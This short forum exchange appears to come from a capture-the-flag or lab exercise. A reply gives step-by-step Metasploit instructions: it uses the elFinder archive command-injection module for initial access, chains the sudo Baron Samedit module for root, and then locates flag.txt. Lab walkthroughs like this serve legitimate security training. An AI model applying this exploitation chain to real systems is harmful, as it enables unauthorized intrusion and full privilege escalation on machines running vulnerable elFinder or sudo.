Perfect. That worked for me. First I ran local_exploit_suggester which gave me a couple of options but none of them worked. I tried googling those exploits to find them on GitHub, but the exploits provided didn’t work out. Thanks!
To find the flag.txt, you need two meterpreter steps
- search elfinder → linux/http/elfinder_archive_cmd_injection
- exploit
- type “background” to put this exploit inito background
- you will be back to meterpreter
- use linux/local/sudo_baron_samedit
- Set the LHOST
- Obtain the session ID from (3) using “session” command
- set SESSION = session id from (7)
- exploit and you will get the root prompt
- find -f flag.txt